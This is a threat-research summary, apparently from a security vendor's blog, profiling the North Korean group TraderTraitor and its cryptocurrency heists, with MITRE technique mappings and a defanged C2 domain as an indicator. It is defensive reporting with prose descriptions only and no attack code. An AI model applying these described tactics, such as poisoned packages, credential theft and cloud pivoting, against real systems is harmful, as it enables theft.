Threat Research

TraderTraitor: Deep Dive

WizBlog

TraderTraitor is a North Korean state-sponsored cyber threat group targeting cryptocurrency and blockchain ecosystems through sophisticated social engineering, supply chain attacks, and cloud compromises. The group has been linked to massive crypto heists, including the $308 million DMM Bitcoin breach and the $1.5 billion Bybit hack. #TraderTraitor #LazarusGroup #DMMBitcoin #Bybit #JumpCloud

Keypoints

  • TraderTraitor is a North Korean cyber threat group under the Lazarus umbrella, financially motivated to steal cryptocurrencies such as Bitcoin and Ether.
  • The group employs tactics including phishing, trojanized cryptocurrency applications, supply chain compromises, and cloud service breaches targeting blockchain companies and developers.
  • Notable operations include the 2024 $308 million DMM Bitcoin exchange heist and the $1.5 billion hack of the Bybit cryptocurrency exchange.
  • TraderTraitor has conducted supply chain attacks via malicious open-source packages on npm and PyPI, and compromised cloud providers like JumpCloud to access downstream crypto firms.
  • They extensively use social engineering, such as fake job offers and coding challenge lures, to compromise developer machines and harvest credentials.
  • The group leverages stolen credentials and session tokens to maintain persistence and conduct reconnaissance in cloud environments, poisoning software supply chains and injecting malicious JavaScript into web applications to divert transactions.
  • Government agencies including the FBI, CISA, and Japan’s NPA have publicly attributed multiple large-scale cryptocurrency thefts to TraderTraitor, linking it to North Korea’s Reconnaissance General Bureau.

MITRE Techniques

  • [T1566.003] Spearphishing via Service – Attackers send malicious messages via Slack, LinkedIn, Telegram to deliver malware or links (“Malicious messages delivered through Slack, LinkedIn, Telegram.”)
  • [T1204.002] User Execution – Victims execute trojanized crypto applications or malicious packages (“Victim runs trojanized crypto app or installs malicious NPM package.”)
  • [T1059.007] Command and Scripting Interpreter: JavaScript – TraderTraitor apps use JavaScript and Node.js to execute commands (“TraderTraitor apps use JavaScript and Node.js.”)
  • [T1059.006] Command and Scripting Interpreter: Python – Fake coding challenges delivered as Python scripts for execution (“Fake coding challenges delivered as Python scripts.”)
  • [T1078] Valid Accounts – Use of stolen credentials like cookies and keys to maintain access (“Stolen credentials (cookies, keys) used to maintain access as a legitimate user.”)
  • [T1553.002] Subvert Trust Controls: Code Signing – Malware apps digitally signed with compromised or fraudulent Apple Developer certificates (“Malware apps signed with stolen or fake Apple Developer certs.”)
  • [T1105] Ingress Tool Transfer – Malware retrieves second-stage payloads from command and control servers (“Malware retrieves second-stage payloads from attacker C2.”)
  • [T1195.001] Compromise Software Dependencies and Development Tools – Use of malicious npm and PyPI packages to compromise development environments (“Malicious NPM/PyPI packages used to compromise dev environments.”)
  • [T1195.002] Compromise Infrastructure: Software Supply Chain – JumpCloud supply chain attack delivering malicious updates to cryptocurrency customers (“JumpCloud supply chain attack to access downstream crypto firms.”)
  • [T1552.004] Unsecured Credentials in Files – RN Stealer extracts credentials and cloud configurations from local files (“RN Stealer extracts credentials and cloud configs from files.”)
  • [T1550.004] Use Alternate Authentication Material – Session cookies used for internal pivoting (“Session cookies used to impersonate users and pivot internally.”)
  • [T1580] Cloud Infrastructure Discovery – Enumeration of IAM roles, S3 buckets, and cloud assets (“Enumeration of IAM roles, S3 buckets, and other cloud assets.”)
  • [T1578.005] Modify Cloud Compute Infrastructure – Injection of malicious JavaScript into static web frontend applications (“Injection of malicious JavaScript into statically hosted frontend (Next.js app).”)
  • [T1087.004] Account Discovery: Cloud Account – Identification of cloud environments and resources to facilitate lateral movement (“Identifies cloud environments and configurations for lateral movement.”)
  • [T1609] Container Images – Use of malicious Docker image to initiate execution (“Use of a malicious Docker image to initiate execution.”)
  • [T1041] Exfiltration Over C2 Channel – Sensitive data exfiltrated via HTTPS channel (“Sensitive data (e.g. keys, credentials) exfiltrated via HTTPS.”)
  • [T1566.001] Spearphishing with Attachment – Fake PDF job offers deploy malware (“Fake PDF job offers deliver malware.”)

Indicators of Compromise

  • [Domain] Command and Control infrastructure – getstockprice[.]com used in Bybit attack for C2 communications
  • [File Hashes] Malware samples – RN Loader and RN Stealer Python scripts used for credential theft and system reconnaissance
  • [GitHub Repositories] Malicious JavaScript packages – npm repositories containing trojanized crypto-related code for supply chain attacks
  • [IP Addresses] Outgoing connections from TraderTraitor malware to known C2 servers documented in Wiz Threat Research public IOC database

Read more: https://www.wiz.io/blog/north-korean-tradertraitor-crypto-heist

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint